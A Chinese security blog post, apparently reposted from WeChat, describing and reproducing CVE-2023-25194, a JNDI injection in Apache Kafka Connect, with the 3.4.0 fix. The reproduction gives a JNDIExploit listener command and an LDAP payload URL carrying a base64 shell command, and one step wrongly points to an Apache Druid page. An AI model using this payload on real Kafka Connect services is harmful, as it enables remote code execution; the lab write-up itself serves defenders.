0x00 团队声明
该漏洞为我团队漏洞监测平台发现,仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x01 产品简介
Kafka Connect是一种用于在Apache Kafka和其他系统之间可扩展且可靠地流式传输数据的工具。它使快速定义将大量数据移入和移出Kafka的连接器变得简单。Kafka Connect可以摄取整个数据库或从所有应用程序服务器收集指标到Kafka主题中,使数据可用于低延迟的流处理。
0x02 漏洞概述
Apache Kafka Connect服务在2.3.0 至 3.3.2 版本中,由于连接时支持使用基于JNDI认证的SASL JAAS配置,导致配置在被攻击者可控的情况下,可能通过JNDI注入执行任意代码。
此漏洞不影响 Kafka server(broker),Kafka Connect服务通常用于在云平台中提供Kafka数据迁移、数据同步的管道能力,其默认HTTP API开放于8083端口。
因此建议对基于Kafka Connect提供的Kafka数据管道服务进行排查,判断是否存在配置可控的情况,对于受影响的服务应将 kafka-clients 升级至 3.4.0 及以上版本。
0x03 漏洞原理
Apache Kafka Connect 是Kafka中用于和其他数据系统传输数据的服务,其独立运行版本可以在Kafka发布包中通过bin/connect-standalone.sh启动,默认会在8083端口开启HTTP REST API服务,可对连接器(Connector)的配置进行操作。
连接器(Connector)是用于连接其他数据源的模块,从 2.3.0 版本开始,为了增加连接器的可重用性和可扩展性,用户可修改 kafka 客户端的 SASL JAAS(授权服务) 配置或 SASL-based 安全协议。3.0.0 版本之后,Kafka Connect 标准化了 Kafka 与其他数据系统的集成,用户可方便地对 Kafka Connect 集群中的连接器属性进行配置。
将连接器中的 Kafka 客户端sasl.jaas.config属性值设置为 com.sun.security.auth.module.JndiLoginModule(通过 producer.override.sasl.jaas.config, consumer.override.sasl.jaas.config或 admin.override.sasl.jaas.config属性进行配置)时,如果连接器连接到攻击者可控的 LDAP 服务器时容易受到反序列化攻击。
为修复此漏洞,从 3.4.0 版本开始,添加了 org.apache.kafka.disallowed.login.modules 系统属性用于禁用 SASL JAAS 配置中不安全的登录模块,并且默认禁用 com.sun.security.auth.module.JndiLoginModule。
0x04 漏洞复现
访问http://your-ip:8888即可查看到Apache Druid主页。
JNDIExploit地址:https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4
开启JNDIExpolit监听:java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.126.130(测试环境)
使用ldap://xxxx:1389/Basic/Command/Base64/[base64_encoded_cmd]进行攻击
要执行的命令 touch /tmp/lm_hacker base64编码后为dG91Y2ggL3RtcC9sbV9oYWNrZXI=
构造payload:ldap://192.168.126.130:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9sbV9oYWNrZXI=
启动BP抓包构造并将PayLoad放入请求
发送数据包,回到靶机,进入漏洞目录下docker-compose exec web bash
这时候我们可以看到lm_hacker文件被成功创建。
0x5 修复建议
目前该漏洞已经修复,受影响用户可及时升级到Apache Kafka 版本3.4.0。
下载链接:https://kafka.apache.org/downloads
~关注我们~
CentOS7系统即将寿终正寝,RCS-TEAM团队为广大读者、粉丝编著的《Linux私教课 技术内核与企业运维篇》已经由清华大学出版社进行出版
官方正版购书渠道
https://item.jd.com/14058912.html
原文始发于微信公众号(小白嘿课):CVE-2023-25194 Apache Kafka Connect JNDI注入漏洞复现
